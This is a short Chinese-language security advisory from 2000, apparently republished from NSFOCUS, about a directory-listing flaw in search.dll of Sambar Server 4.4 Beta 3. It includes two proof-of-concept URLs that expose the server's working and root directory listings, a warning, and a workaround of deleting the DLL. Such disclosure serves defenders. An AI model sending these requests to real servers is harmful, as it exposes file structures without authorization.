Sambar Server search.dll泄漏目录内容

发布日期：2000-09-17
更新日期：2000-09-18

受影响系统：

Sambar Server 4.4Beta 3

- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0

描述：

---

Sambar Server是一个应用于Windows平台的web server.它的4.4 Beta版中所带的search.dll
存在一个安全问题，允许远程攻击者察看Sambar服务器上的目录。


<*来源: dethy@synnergy.net *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1. 泄漏当前工作目录的文件列表：
http://server-running-sambar.com/search.dll?search?query=&logic=AND


2. 泄漏根目录的文件列表：
http://server-running-sambar.com/search.dll?search?query=/&logic=AND




建议：

---

临时解决方法：

NSFOCUS建议您暂时备份并删除search.dll文件。

厂商补丁：

目前厂商还没有提供补丁或者升级程序

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!